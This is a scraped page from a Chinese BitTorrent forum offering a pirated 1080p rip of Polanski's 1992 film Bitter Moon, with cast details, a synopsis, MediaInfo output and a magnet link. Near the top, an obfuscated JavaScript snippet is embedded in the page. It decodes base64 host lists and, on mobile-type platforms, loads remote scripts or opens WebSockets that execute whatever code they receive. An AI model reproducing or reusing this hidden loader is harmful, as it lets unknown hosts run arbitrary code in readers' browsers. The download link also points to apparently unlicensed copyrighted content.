苦月亮[中文字幕].Bitter.Moon.1992.1080p.BluRay.x265.10bit.DTS.2.0 9.97GB

版主小s 20天前 471

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 苦月亮 / 钥匙孔的爱(台) / 偷月迷情
◎片  名 Bitter Moon
◎年  代 1992
◎产  地 法国 / 英国
◎类  别 剧情 / 爱情 / 惊悚 / 情色
◎语  言 英语 / 法语
◎上映日期 1992-09-23
◎IMDb链接 https://www.imdb.com/title/tt0104779/
◎豆瓣评分 8.4/10 (91408人评价)
◎豆瓣链接 https://movie.douban.com/subject/1301582/
◎片  长 139 分钟
◎导  演 罗曼·波兰斯基 Roman Polanski (id:1054420)
◎编  剧 罗曼·波兰斯基 Roman Polanski (id:1054420)
       热拉尔·布拉什 Gérard Brach (id:1072323)
       约翰·布朗约翰 John Brownjohn (id:1437177)
◎演  员 彼德·考约特 Peter Coyote (id:1027864)
       艾玛纽尔·塞尼耶 Emmanuelle Seigner (id:1010589)
       休·格兰特 Hugh Grant (id:1003493)
       克里斯汀·斯科特·托马斯 Kristin Scott Thomas (id:1021997)
       维克多·班纳杰 Victor Banerjee (id:1028107)
       Olivia Brunaux Olivia Brunaux (id:1068582)
       杰弗里·凯里 Geoffrey Carey (id:1320604)
       罗伯特·本穆萨 Robert Benmussa (id:1278340)
       斯托卡特·詹宁 Stockard Channing (id:1004633)
       罗伯特·本穆萨 Robert Benmussa (id:1278340)
       罗曼·波兰斯基 Roman Polanski (id:1054420)
       蒂姆森·布里尔 Timothy Burrill (id:1019852)
       阿兰·萨德 Alain Sarde (id:1003524)
       范吉利斯 Vangelis (id:1000517)
       托尼诺·德里·戈里 Tonino Delli Colli (id:1041877)
       埃尔维·德鲁兹 Hervé de Luze (id:1282214)
       Willy Holt Willy Holt (id:1038441)
       威利霍尔特 Willy Holt (id:1282542)
       Jackie Budin Jackie Budin (id:1279585)

◎标  签 情色 / 爱情 / 法国 / 波兰斯基 / 人性 / 罗曼·波兰斯基 / 法国电影 / RomanPolanski

◎简  介
  奈杰尔(休?格兰特 Hugh Grant 饰)陷入了七年之痒的婚姻中。他和妻子菲奥纳(克里斯汀?斯科特?托马斯 Kristin Scott Thomas饰)决定乘坐游轮前往印度旅游,尝试改变糟糕的关系。船上,他遇见了瘫痪作家奥斯卡(彼德?考约特 Peter Coyote 饰)和他的美艳妻子咪咪(埃玛纽埃尔?塞纳 Emmanuelle Seigner饰)。奥斯卡似乎要把他和咪咪之间的异常关系告诉陌生人奈杰尔。                                       
                                    奥斯卡认识咪咪之初,两人爱得死去活来,情欲之火熊熊燃烧。然而咪咪摄人的魅力只让奥斯卡着迷了一段不长的时间。他开始厌倦,尽管咪咪为了他堕胎、割除子宫、对他一往情深,奥斯卡还是残忍的把她支走。一场车祸后,躺在医院的奥斯卡却赫然发现,咪咪就站在他的病床前,怒不可遏的把他拖下病床,奥斯卡终身残废。                                       
                                    他们继续生活在一处。咪咪从来没停止过对奥斯卡的虐待,二人...

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 164350298394614032871120124388899707177 (0x7BA4B752A381B773143C4AC0D8765929)
  4. Complete name                            : [email protected]M.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 9.97 GiB
  8. Duration                                 : 2 h 19 min
  9. Overall bit rate                         : 10.2 Mb/s
  10. Movie name                               : Bitter Moon 1992
  11. Encoded date                             : UTC 2021-10-02 04:34:12
  12. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@Main
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 2 h 19 min
  23. Bit rate                                 : 8 662 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 1 014 pixels
  26. Display aspect ratio                     : 1.893
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 23.976 (24000/1001/53354) FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.186
  33. Stream size                              : 8.46 GiB (85%)
  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  35. Encoding settings                        : rc=crf / crf=18.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1014 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Audio
  39. ID                                       : 2
  40. ID in the original source medium         : 4352 (0x1100)
  41. Format                                   : DTS
  42. Format/Info                              : Digital Theater Systems
  43. Codec ID                                 : A_DTS
  44. Duration                                 : 2 h 19 min
  45. Bit rate mode                            : Constant
  46. Bit rate                                 : 1 509 kb/s
  47. Channel(s)                               : 2 channels
  48. Channel layout                           : L R
  49. Sampling rate                            : 48.0 kHz
  50. Frame rate                               : 93.750 FPS (512 SPF)
  51. Bit depth                                : 16 bits
  52. Compression mode                         : Lossy
  53. Stream size                              : 1.47 GiB (15%)
  54. Language                                 : English
  55. Default                                  : Yes
  56. Forced                                   : No
  57. Original source medium                   : Blu-ray
  58. Text #1
  59. ID                                       : 3
  60. Format                                   : PGS
  61. Muxing mode                              : zlib
  62. Codec ID                                 : S_HDMV/PGS
  63. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  64. Duration                                 : 2 h 16 min
  65. Bit rate                                 : 26.1 kb/s
  66. Count of elements                        : 2263
  67. Stream size                              : 25.4 MiB (0%)
  68. Title                                    : chs
  69. Language                                 : Chinese
  70. Default                                  : Yes
  71. Forced                                   : No
  72. Text #2
  73. ID                                       : 4
  74. Format                                   : PGS
  75. Muxing mode                              : zlib
  76. Codec ID                                 : S_HDMV/PGS
  77. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  78. Duration                                 : 2 h 16 min
  79. Bit rate                                 : 26.5 kb/s
  80. Count of elements                        : 2263
  81. Stream size                              : 25.8 MiB (0%)
  82. Title                                    : cht
  83. Language                                 : Chinese
  84. Default                                  : No
  85. Forced                                   : No
  86. Text #3
  87. ID                                       : 5
  88. ID in the original source medium         : 4608 (0x1200)
  89. Format                                   : PGS
  90. Muxing mode                              : zlib
  91. Codec ID                                 : S_HDMV/PGS
  92. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  93. Duration                                 : 2 h 13 min
  94. Bit rate                                 : 26.9 kb/s
  95. Count of elements                        : 3116
  96. Stream size                              : 25.8 MiB (0%)
  97. Language                                 : English
  98. Default                                  : No
  99. Forced                                   : No
  100. Original source medium                   : Blu-ray
  101. Menu
  102. 00:00:00.000                             : Chapter 00
  103. 00:12:17.737                             : Chapter 01
  104. 00:24:23.420                             : Chapter 02
  105. 00:37:25.409                             : Chapter 03
  106. 00:55:08.305                             : Chapter 04
  107. 01:14:37.723                             : Chapter 05
  108. 01:36:40.503                             : Chapter 06
  109. 01:58:02.867                             : Chapter 07


TAGS 剧情 情色 惊悚 爱情

磁力链:
  • magnet:?xt=urn:btih:FF22CEB41F00E7FA7D100FCB939327F50CBC9BBC
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回